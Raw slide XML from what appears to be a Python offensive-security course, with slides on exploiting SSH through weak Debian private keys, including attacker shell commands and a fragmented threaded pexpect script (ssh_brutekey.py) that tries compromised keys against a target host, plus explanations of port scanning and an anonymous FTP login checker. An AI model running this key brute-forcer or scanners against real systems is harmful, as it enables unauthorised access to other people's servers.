                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>attacker# tar –xf debian_ssh_dsa_1024_x86.tar</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>attacker# cd dsa/1024/</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>attacker #ls</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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107450" y="859600"/>
            <a:ext cx="10375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Exploiting SSH Through Weak Private Keys CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="Google Shape;480;p15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305075" y="2252400"/>
            <a:ext cx="11558400" cy="4457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pexpect</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argparse</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threading</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maxConnections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5</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="D19A66"/>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connection_lock</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threading</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BoundedSemaphore</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value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maxConnections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Stop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False</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="D19A66"/>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Fails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0</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="D19A66"/>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connect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keyfile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release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True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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>global</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Stop</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="E06C75"/>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C678DD"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>global</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Fails</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="E06C75"/>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600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="E06C75"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>
              </a:highlight>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1fa93aff712_0_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107450" y="859600"/>
            <a:ext cx="10375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Exploiting SSH Through Weak Private Keys CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="Google Shape;486;g1fa93aff712_0_12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305075" y="2252400"/>
            <a:ext cx="11558400" cy="4457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try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perm_denied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'Permission denied'</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ssh_newkey</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'Are you sure you want to continue'</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conn_closed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'Connection closed by remote host'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opt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'-o PasswordAuthentication=no'</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conn_str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'ssh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-i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format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keyfile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opt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child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pexpect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spawn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conn_str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child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expect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pexpect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TIMEOUT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perm_denied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ssh_newkey</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conn_closed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2</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Adding Host to ~/.ssh/known_hosts'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child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sendline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'yes'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connect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keyfile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False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E06C75"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>
              </a:highlight>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1fa93aff712_0_7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107450" y="859600"/>
            <a:ext cx="10375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Exploiting SSH Through Weak Private Keys CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Google Shape;492;g1fa93aff712_0_7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305075" y="2252400"/>
            <a:ext cx="11558400" cy="4457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elif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3</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Connection Closed By Remote Host'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Fails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1</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="D19A66"/>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elif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&gt;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3</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Success.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format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keyfile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Stop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True</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="D19A66"/>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Exception</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finally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release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connection_lock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release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100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="E06C75"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>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1fa93aff712_0_2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107450" y="859600"/>
            <a:ext cx="10375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Exploiting SSH Through Weak Private Keys CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Google Shape;498;g1fa93aff712_0_2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305075" y="2252400"/>
            <a:ext cx="11558400" cy="4457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__name__</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'__main__'</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argparse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ArgumentParser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usage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'python3 ssh_brutekey.py TARGET_HOST '</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'-u USERNAME -d KEY_DIRECTORY'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add_argument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type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metavar</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'TARGET_HOST'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help</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'specify target host'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add_argument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type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metavar</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required</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True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help</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'specify the user name'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add_argument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'-d'</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type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metavar</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'KEY_DIRECTORY'</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required</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True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help</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'specify directory containing the compromised SSH '</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'keys'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parse_args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E06C75"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk1"/>
              </a:highlight>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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107450" y="859600"/>
            <a:ext cx="10375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00"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Exploiting SSH Through Weak Private Keys CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="504" name="Google Shape;504;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375975" y="2080200"/>
            <a:ext cx="10798500" cy="4680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listdir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.d):</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Stop</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Exiting: Key Found.'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exit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0</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Fails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&gt;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5</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Exiting: Too Many Connections Closed By Remote Host.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 Adjust number of simultaneous threads.'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exit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0</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connection_lock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acquire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fullpath</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path</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join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.d, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>filename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Testing keyfile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fullpath</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threading</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Thread</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target</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connect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.u, </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.tgt_host, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="1600" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="E06C75"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>fullpath</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start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000000"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk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e9adf94182_2_17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="33796" y="8350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latin typeface="Russo One"/>
                <a:ea typeface="Russo One"/>
                <a:cs typeface="Russo One"/>
                <a:sym typeface="Russo One"/>
              </a:rPr>
              <a:t>BUILDING A PORT SCANNER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>CONTD..</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Russo One"/>
              <a:ea typeface="Russo One"/>
              <a:cs typeface="Russo One"/>
              <a:sym typeface="Russo One"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Google Shape;224;g1e9adf94182_2_17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="33796" y="2775392"/>
            <a:ext cx="11472600" cy="4333261"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The passage is saying that by using a set of functions called Socket API, we can create, bind, listen, connect, or send information over the internet using TCP/IP protocols. </a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>To do this, we need to have a good understanding of how TCP/IP and sockets work. The passage also mentions that most applications that can be accessed over the internet by using the TCP protocol. </a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>In a target organization, for example, the web server might be on port 80, the email server on port 25, and the file transfer server on port 21. </a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="349250" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>To access these services, an attacker must know both the IP address of the target organization and the specific port number the service is using.</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Google Shape;225;g1e9adf94182_2_17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329939" y="2197542"/>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1e9a65c21fa_16_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279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Building an Anonymous FTP Scanner with Python</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="Google Shape;510;g1e9a65c21fa_16_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680326" y="2336875"/>
            <a:ext cx="11209200" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-318770" lvl="0" marL="331470" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2020">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Considering the security implications, it seems insane that any sites would offer anonymous FTP access. However, many sites surprisingly provide legitimate reasons for this kind of FTP access such as promoting the idea that this enables a more enhanced means of accessing software updates. </a:t>
            </a:r>
            <a:endParaRPr sz="2020">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-318770" lvl="0" marL="331470" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2020">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We can utilize the ftplib library in Python in order to build a small script to determine if a server offers anonymous logins.</a:t>
            </a:r>
            <a:endParaRPr sz="2020">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-318770" lvl="0" marL="331470" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2020">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> The function anonLogin() takes a hostname and returns a Boolean that describes the availability of anonymous logins. In order to deter mine this Boolean, the function attempts to create an FTP connection with anonymous credentials. </a:t>
            </a:r>
            <a:endParaRPr sz="2020">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-318770" lvl="0" marL="331470" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2020">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>If it succeeds, it returns the value "True". If, in the process of creating a connection, the function throws an exception it returns it as "False".</a:t>
            </a:r>
            <a:endParaRPr sz="2020">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1e9a65c21fa_16_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279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Building an Anonymous FTP Scanner with Python</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="Google Shape;516;g1e9a65c21fa_16_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190126" y="2713945"/>
            <a:ext cx="11235159" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This statement describes the security implications of offering anonymous FTP access on a server and how it can be exploited by attackers. Anonymous FTP access allows anyone to connect to the server using a pre-defined username and password, typically "anonymous" and "guest," without the need for any authentication. It is considered a security risk because it allows anyone to access the server and potentially upload or download files, including malicious files.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Despite this, some sites still offer anonymous FTP access for legitimate reasons such as providing software updates or open-source software. To check if a server offers anonymous logins, the statement suggests using the ftplib library in Python to build a script that attempts to connect to the server using anonymous credentials. The function anonLogin() takes a hostname and returns a Boolean that describes the availability of anonymous logins.</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="517" name="Google Shape;517;g1e9a65c21fa_16_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279321" y="2150850"/>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1e9a65c21fa_16_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279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Building an Anonymous FTP Scanner with Python</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="Google Shape;523;g1e9a65c21fa_16_12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680320" y="2336873"/>
            <a:ext cx="11188025" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>If the function is able to connect to the server using anonymous credentials, it returns "True". If the function throws an exception, such as an error message, it returns "False", indicating that the server does not offer anonymous logins. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
